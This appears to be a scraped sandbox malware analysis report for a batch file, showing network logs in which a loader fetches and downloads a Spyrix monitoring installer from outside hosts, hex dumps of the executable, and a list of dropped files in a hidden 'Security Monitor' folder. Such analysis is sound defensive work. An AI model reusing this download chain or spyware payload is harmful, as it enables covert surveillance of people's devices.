meoq11840hkx8zd8p0zx3zxxraxtr24ph1owvrn8jpc055e3e92h10hp2oksmxtobqhb9mo4mr36i48tg4rem an70t9sqgx716siym862a7vrea4jqisokp59kfwvlktuazpq2yby

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:10:07 UTC	110	OUT	GET /loader/link.php?prg_id=sfk HTTP/1.1 Host: cdnbaynet.com User-Agent: sfk-dst-loader-2.0 Accept: /
2024-10-02 04:10:09 UTC	165	IN	HTTP/1.1 200 OK Server: nginx/1.17.3 Date: Wed, 02 Oct 2024 04:10:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 04:10:09 UTC	74	IN	Data Raw: 33 66 0d 0a 68 74 74 70 73 3a 2f 2f 73 77 74 62 2d 64 6f 77 6e 6c 6f 61 64 2e 73 70 79 72 69 78 2d 73 66 6b 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 73 66 6b 2f 73 66 6b 5f 73 65 74 75 70 2e 65 78 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 3fhttps://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe0

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:10:10 UTC	125	OUT	GET /download/sfk/sfk_setup.exe HTTP/1.1 Host: swtb-download.spyrix-sfk.com User-Agent: sfk-dst-loader-2.0 Accept: /
2024-10-02 04:10:10 UTC	380	IN	HTTP/1.1 200 OK Server: nginx/1.17.3 Date: Wed, 02 Oct 2024 04:10:10 GMT Content-Type: application/octet-stream Content-Length: 33441448 Connection: close Last-Modified: Wed, 02 Oct 2024 04:09:15 GMT Content-Disposition: attachment; filename="sfk_setup.exe" ETag: "66fcc76b-1fe46a8" Strict-Transport-Security: max-age=31536000; includeSubDomains Accept-Ranges: bytes
2024-10-02 04:10:10 UTC	16004	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-10-02 04:10:10 UTC	16384	IN	Data Raw: 08 c7 ff ff c3 8d 40 00 8b 10 85 d2 74 0e c7 00 00 00 00 00 50 52 e8 f1 c6 ff ff 58 c3 8d 40 00 53 56 89 c3 89 d6 8b 03 85 c0 74 0c c7 03 00 00 00 00 50 e8 d4 c6 ff ff 83 c3 04 4e 75 e8 5e 5b c3 8d 40 00 39 10 74 23 85 d2 0f 84 b8 ff ff ff 8b 4a fc d1 e9 0f 84 ad ff ff ff 51 52 50 e8 a1 c6 ff ff 85 c0 0f 84 6d ff ff ff c3 55 8b ec 81 c4 04 f0 ff ff 50 83 c4 fc 53 56 57 8b f1 89 55 fc 8b f8 85 f6 7f 09 8b c7 e8 7a ff ff ff eb 6c 8d 46 01 3d ff 07 00 00 7d 2f 56 8b 45 08 50 8d 85 fc ef ff ff 8b 4d fc ba ff 07 00 00 e8 b6 fc ff ff 8b d8 85 db 7e 11 8d 95 fc ef ff ff 8b c7 8b cb e8 51 00 00 00 eb 33 8d 5e 01 8b c7 8b d3 e8 d3 00 00 00 56 8b 45 08 50 8b 07 e8 b7 00 00 00 8b 4d fc 8b d3 e8 7d fc ff ff 8b d8 85 db 7d 02 33 db 8b c7 8b d3 e8 ac 00 00 00 5f 5e 5b Data Ascii: @tPRX@SVtPNu^[@9t#JQRPmUPSVWUzlF=}/VEPM~Q3^VEPM}}3_^[
2024-10-02 04:10:10 UTC	16384	IN	Data Raw: 4e 32 e4 c3 80 7d dc 00 74 06 66 b8 2d 00 66 ab c3 e8 ee ff ff ff 0f bf 4d da 31 d2 3b 4d 0c 7f 25 83 f9 fd 7c 20 09 c9 7f 22 66 b8 30 00 66 ab 80 3e 00 74 4b 66 8b 45 f6 66 ab f7 d9 66 b8 30 00 f3 66 ab eb 20 b9 01 00 00 00 42 ac 08 c0 74 20 32 e4 66 ab e2 f5 ac 08 c0 74 1c 32 e4 c1 e0 10 66 8b 45 f6 ab ac 08 c0 74 0d 32 e4 66 ab eb f5 66 b8 30 00 f3 66 ab 09 d2 74 04 31 c0 eb 22 c3 e8 7e ff ff ff e8 6e ff ff ff 66 ab 66 8b 45 f6 66 ab 8b 4d 0c 49 e8 5d ff ff ff 66 ab e2 f7 b4 2b 8b 4d 08 83 f9 04 76 02 31 c9 b0 45 8a 5d dd b7 01 0f bf 55 da 4a e8 e3 fd ff ff c3 e8 41 ff ff ff 8b 55 08 83 fa 12 72 05 ba 12 00 00 00 0f bf 4d da 09 c9 7f 08 66 b8 30 00 66 ab eb 2e 31 db 80 7d 10 02 74 0a 89 c8 48 b3 03 f6 f3 88 e3 43 e8 02 ff ff ff 66 ab 49 74 12 4b 75 f3 Data Ascii: N2}tf-fM1;M%\| "f0f>tKfEff0f Bt 2ft2fEt2ff0ft1"~nffEfMI]f+Mv1E]UJAUrMf0f.1}tHCfItKu
2024-10-02 04:10:11 UTC	16384	IN	Data Raw: e8 ff 74 ff ff 5a 5e 5b c3 00 00 00 b0 04 02 00 ff ff ff ff 1d 00 00 00 43 00 6f 00 6d 00 70 00 72 00 65 00 73 00 73 00 65 00 64 00 20 00 62 00 6c 00 6f 00 63 00 6b 00 20 00 69 00 73 00 20 00 63 00 6f 00 72 00 72 00 75 00 70 00 74 00 65 00 64 00 00 00 53 56 57 55 51 8b f9 8b f0 33 c0 89 04 24 8b ea 85 ff 7e 3e 83 7e 18 00 75 0d 83 7e 0c 00 74 32 8b c6 e8 09 ff ff ff 8b df 3b 5e 18 76 03 8b 5e 18 8b d5 8b 46 14 8d 44 06 1c 8b cb e8 a3 64 ff ff 01 5e 14 29 5e 18 03 eb 2b fb 01 1c 24 85 ff 7f c2 8b 04 24 5a 5d 5f 5e 5b c3 90 53 56 57 8b f1 8b fa 8b d8 8b 43 04 85 c0 74 0b 8b d7 8b ce 8b 18 ff 53 04 eb 25 8b d7 8b ce 8b c3 e8 7e ff ff ff 3b f0 74 16 b9 84 cb 40 00 b2 01 a1 dc c4 40 00 e8 b5 cc ff ff e8 14 74 ff ff 5f 5e 5b c3 b0 04 02 00 ff ff ff ff 1d 00 00 Data Ascii: tZ^[Compressed block is corruptedSVWUQ3$~>~u~t2;^v^FDd^)^+$$Z]_^[SVWCtS%~;t@@t_^[
2024-10-02 04:10:11 UTC	16384	IN	Data Raw: 41 00 68 7c 17 41 00 68 60 17 41 00 e8 83 50 ff ff 50 e8 8d 50 ff ff a3 20 85 41 00 83 3d 1c 85 41 00 00 74 09 83 3d 20 85 41 00 00 75 04 33 c0 eb 02 b0 01 a2 24 85 41 00 8d 45 f8 e8 0b a3 ff ff 8b 45 f8 8d 55 fc e8 10 9c ff ff 8d 45 fc ba c4 17 41 00 e8 bb 38 ff ff 8b 45 fc ba 00 80 00 00 e8 9a 95 ff ff 8d 55 f4 b8 fb 3a 78 4c e8 8d a8 ff ff 33 c0 5a 59 59 64 89 10 68 19 17 41 00 8d 45 f4 ba 03 00 00 00 e8 7f 35 ff ff c3 e9 91 27 ff ff eb eb 8b e5 5d c3 00 00 00 57 00 6f 00 77 00 36 00 34 00 44 00 69 00 73 00 61 00 62 00 6c 00 65 00 57 00 6f 00 77 00 36 00 34 00 46 00 73 00 52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 69 00 6f 00 6e 00 00 00 00 00 6b 00 65 00 72 00 6e 00 65 00 6c 00 33 00 32 00 2e 00 64 00 6c 00 6c 00 00 00 00 00 57 00 6f 00 77 00 36 Data Ascii: Ah\|Ah`APPP A=At= Au3$AEEUEA8EU:xL3ZYYdhAE5']Wow64DisableWow64FsRedirectionkernel32.dllWow6
2024-10-02 04:10:11 UTC	16384	IN	Data Raw: 02 8d 22 b0 e3 2d 73 64 d6 ee 50 f8 ed b3 02 09 8b 0b af 10 c8 a4 fd 03 4b c6 c9 a5 ae db ef 8d 00 26 ce 56 c3 48 d1 4b 10 36 17 48 24 8c 19 42 38 8b 07 03 23 89 29 92 9a fe 8a c2 a2 0d 76 af 3f 91 da d8 6e bd ec 34 75 aa 50 ae cf 81 37 02 98 34 8d 1a a9 2c b5 5a 0b c0 5a 3d 80 a1 59 1e 61 ea c5 40 4e 26 77 05 a2 86 99 52 fd db 67 09 8a 2c bf 00 88 ee 2c 2e 94 ff e5 ba fd 06 6f 04 60 18 3f 2b f1 07 01 79 ad ed 38 c2 be d7 1d f3 9f 98 15 99 8b 5f 27 bc bd de f6 46 31 1a 89 2f 97 8e 95 f3 5d 9f 03 83 67 02 a8 1a 2c 90 b1 d0 76 58 4d 1b 29 fc ea 62 c9 63 01 11 62 c3 27 84 db 9e b6 b7 98 ca bf 21 da a0 12 38 a5 74 82 dc ef fa 1c 18 bc 12 c0 d8 99 94 93 09 b5 4c 77 03 ba da 8e 65 64 2f c2 65 83 b9 1b 10 05 cc 94 e9 ff 7e 5e e1 c3 8f ed 67 7d ba c3 f1 60 c9 b8 Data Ascii: "-sdPK&VHK6H$B8#)v?n4uP74,ZZ=Ya@N&wRg,,.o`?+y8_'F1/]g,vXM)bcb'!8tLwed/e~^g}`
2024-10-02 04:10:11 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe a4 62 1f fd 9e 64 dc ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff fd b0 80 ff fd e7 d8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ed e3 ff fd b6 8a ff ff a0 64 ff ff a0 64 Data Ascii: bddddddddddddddddddddddddd
2024-10-02 04:10:11 UTC	16384	IN	Data Raw: ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff fd cc ad ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fb f9 ff fd d6 bd ff fe af 7e ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff fd c2 9d ff ff fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: ddddddddddddd~ddddddddddddddddddddddddddddddd
2024-10-02 04:10:11 UTC	16384	IN	Data Raw: ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff fd cc ad ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ea de ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 Data Ascii: dddddddddddddddddddddddddddddddd
2024-10-02 04:10:11 UTC	16384	IN	Data Raw: ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 Data Ascii: dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:10:15 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cT+9XekNm5bPwLf&MD=3TyOahlY HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-02 04:10:15 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 8c3875a3-db07-4cb1-b32c-35675745a383 MS-RequestId: ae0e8c63-5da3-40a7-ae73-fe4f3808e034 MS-CV: 5ZvzYb4naUOwHb3V.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 02 Oct 2024 04:10:15 GMT Connection: close Content-Length: 24490
2024-10-02 04:10:15 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-10-02 04:10:15 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report c5WMpr1cOc.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\cfg.cmd (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.url (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.ico (copy)

C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.png (copy)

Windows Analysis Report
c5WMpr1cOc.bat

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:10:54 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cT+9XekNm5bPwLf&MD=3TyOahlY HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-02 04:10:54 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 430e6bef-a6c8-43ac-b2d0-49e16de48e1c MS-RequestId: 8b771f8a-9842-430e-acea-440073a1635b MS-CV: JEASimkAyUq5EdIk.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 02 Oct 2024 04:10:54 GMT Connection: close Content-Length: 30005
2024-10-02 04:10:54 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-10-02 04:10:54 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:11:35 UTC	663	OUT	GET / HTTP/1.1 Host: dashboard.spyrix.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 04:11:35 UTC	248	IN	HTTP/1.1 200 OK Server: nginx/1.17.3 Date: Wed, 02 Oct 2024 04:11:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: DENY Strict-Transport-Security: max-age=31536000; X-State: 3.0
2024-10-02 04:11:35 UTC	650	IN	Data Raw: 32 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 0a 20 20 20 20 72 65 6c 3d 22 69 63 6f 6e 22 0a 20 20 20 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 0a 20 20 2f 3e 0a 20 20 3c 6d 65 74 61 0a 20 20 20 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 0a 20 20 2f 3e 0a 20 20 3c 6d 65 74 61 0a 20 20 20 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 Data Ascii: 27e<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8" /> <link rel="icon" href="/favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="robots" content="noinde

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:11:36 UTC	594	OUT	GET /dashboard30/assets/index-004f4025.js HTTP/1.1 Host: cdn.cdndownload.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://dashboard.spyrix.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://dashboard.spyrix.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-02 04:11:36 UTC	405	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 04:11:36 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT ETag: W/"66fa817d-135fd2" Content-Encoding: gzip Access-Control-Allow-Origin: https://dashboard.spyrix.com Cache: STALE X-Cached-Since: 2024-10-01T20:47:23+00:00 X-Node: m9-up-gc233
